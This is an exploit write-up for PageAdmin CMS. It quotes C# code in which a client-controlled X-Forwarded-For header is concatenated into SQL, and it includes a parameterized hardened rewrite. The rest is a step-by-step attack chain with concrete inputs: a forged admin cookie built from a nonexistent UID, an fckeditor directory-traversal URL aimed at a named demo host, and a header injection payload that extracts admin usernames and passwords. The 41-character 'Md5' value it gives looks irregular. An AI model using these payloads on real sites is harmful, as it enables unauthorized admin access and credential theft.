PageAdmin CMS latest SQL Injection
The log saving function of the system does not filter IP addresses, leading to the SQL injection vulnerability.
```csharp
// PageAdmin.Log
public void Save(int SiteId, int IsMaster, string thetype, int state, string username, string description)
{
    string clientIP = this.GetClientIP();
    Conn conn = new Conn();
    string connectionString = conn.Constr();
    OleDbConnection oleDbConnection = new OleDbConnection(connectionString);
    oleDbConnection.Open();
    // clientIP (taken from X-Forwarded-For) is concatenated into the SQL text without escaping
    string cmdText = string.Concat(new object[]
    {
        "insert into pa_log([site_id],[task_id],[ismaster],[state],[thetype],[username],[url],[description],[ip],[thedate]) values(",
        SiteId, ",0,", IsMaster, ",", state, ",'", this.f(thetype), "','", this.f(username), "','",
        HttpContext.Current.Request.RawUrl, "','", this.f(description), "','", clientIP, "','", DateTime.Now, "')"
    });
    OleDbCommand oleDbCommand = new OleDbCommand(cmdText, oleDbConnection);
    oleDbCommand.ExecuteNonQuery();
    oleDbConnection.Close();
}

// PageAdmin.Log
private string GetClientIP()
{
    string result;
    if (HttpContext.Current == null)
    {
        result = "127.0.0.1";
    }
    else
    {
        HttpRequest request = HttpContext.Current.Request;
        // X-Forwarded-For is consulted first and is fully client-controlled
        string text = request.ServerVariables["HTTP_X_FORWARDED_FOR"];
        if (string.IsNullOrEmpty(text))
        {
            text = request.ServerVariables["REMOTE_ADDR"];
        }
        if (string.IsNullOrEmpty(text))
        {
            text = request.UserHostAddress;
        }
        result = text;
    }
    return result;
}
```
As can be seen, the IP address is taken from the HTTP_X_FORWARDED_FOR request header, which the client controls, and is concatenated directly into the INSERT statement without any filtering.
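A hardened rewrite of the two methods above, added here as an example and not PageAdmin's code: the insert is parameterized so the IP value can no longer change the query, and X-Forwarded-For is honoured only when the direct peer is a trusted proxy and the value parses as an IP address. The connection string argument, the TrustedProxies list and the column widths are constructed assumptions.

```csharp
using System;
using System.Data.OleDb;
using System.Net;
using System.Web;

public sealed class SafeLog
{
    // Constructed example value: only these reverse proxies may set X-Forwarded-For.
    private static readonly string[] TrustedProxies = { "10.0.0.5" };

    public void Save(string connectionString, int siteId, int isMaster, string thetype,
                     int state, string username, string description)
    {
        string clientIP = GetClientIP();
        // OleDb placeholders are positional '?', so parameters are added in column order.
        const string sql =
            "insert into pa_log([site_id],[task_id],[ismaster],[state],[thetype],[username]," +
            "[url],[description],[ip],[thedate]) values(?,0,?,?,?,?,?,?,?,?)";
        using (var conn = new OleDbConnection(connectionString))
        using (var cmd = new OleDbCommand(sql, conn))
        {
            cmd.Parameters.Add("site_id", OleDbType.Integer).Value = siteId;
            cmd.Parameters.Add("ismaster", OleDbType.Integer).Value = isMaster;
            cmd.Parameters.Add("state", OleDbType.Integer).Value = state;
            cmd.Parameters.Add("thetype", OleDbType.VarWChar, 50).Value = thetype ?? "";
            cmd.Parameters.Add("username", OleDbType.VarWChar, 50).Value = username ?? "";
            cmd.Parameters.Add("url", OleDbType.VarWChar, 500).Value = HttpContext.Current.Request.RawUrl;
            cmd.Parameters.Add("description", OleDbType.VarWChar, 500).Value = description ?? "";
            cmd.Parameters.Add("ip", OleDbType.VarWChar, 45).Value = clientIP;
            cmd.Parameters.Add("thedate", OleDbType.Date).Value = DateTime.Now;
            conn.Open();
            cmd.ExecuteNonQuery();
        }
    }

    // Trust X-Forwarded-For only when the direct peer is a known proxy, and
    // accept its first entry only if it parses as an IP address.
    internal static string GetClientIP()
    {
        if (HttpContext.Current == null) return "127.0.0.1";
        HttpRequest request = HttpContext.Current.Request;
        string peer = request.ServerVariables["REMOTE_ADDR"] ?? request.UserHostAddress;
        string forwarded = request.ServerVariables["HTTP_X_FORWARDED_FOR"];
        IPAddress parsed;
        if (Array.IndexOf(TrustedProxies, peer) >= 0 && !string.IsNullOrEmpty(forwarded)
            && IPAddress.TryParse(forwarded.Split(',')[0].Trim(), out parsed))
            return parsed.ToString();
        return peer;
    }
}
```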
Because the injection relies on database error messages, the Access version cannot be exploited this way; the SQL Server version can.
Most calls to this logging function happen only when the website is modified, but it is also called during back-end (admin) login.
Some websites have hidden the back-end login address. In that case, a directory traversal vulnerability in the bundled fckeditor can be used to find it. The vulnerable file is:
/E/incs/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
This is similar to the vulnerability in 2.x: only the Cookie is checked. The code is too long to paste here.
It checks whether the Master cookie exists, then whether Master[UID] exists, and then queries the user table by that UID. If the user is found, it checks whether the user is in the admin group; if so, the user's last logon time for that UID is hashed with the built-in Md5 function and compared with Master[Valicate], which can be bypassed in the same way. But there is a further problem: if the UID does not exist, an empty string "" is hashed and compared with Master[Valicate], so submitting a UID that does not exist together with the Md5 of "" as the value of Master[Valicate] bypasses the verification.
The following aspx page computes the expected string 17b62103fec08a1333215b141bb18217f11c8e13a:
```aspx
<%@ Page Language="c#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.OleDb" %>
<%@ Import Namespace="PageAdmin" %>
<script Language="C#" Runat="server">
    protected void Page_Load(Object sender, EventArgs e)
    {
        // Md5 of the empty string, as computed by PageAdmin's own Md5 class
        Response.Write(new Md5().Get_Md5(""));
    }
</script>
```
Finally, use Cookie: Master = 1 & UID = 9999 & Valicate = 17b62103fec08a1333215b141bb18217f11c8e13a to bypass.
Most fckeditor.net versions have the directory traversal vulnerability: setting the current folder to d:/ lists the files on drive D.
If you do not have permission to list the root of the drive, set the current folder to ! instead; the resulting error message reveals the website's filesystem path.
Http://demo.pageadmin.net/e/incs/fckeditor/editor/filemanager/connectors/aspx/connector.aspx? Command = GetFoldersAndFiles & Type = File & CurrentFolder =!
In this way you can find the back-end path, log on to the back end, and use Burp to modify the X-Forwarded-For header for the injection.
Set the HTTP header:
X-Forwarded-For: 8.8.8.8 ', ''); select 1 from pa_member where (select top 1 username +': '+ userpassword from pa_member where m_group = 'admin')> 0 --
Then open the back-end login page and log on to the website.
Solution:
Use the session instead.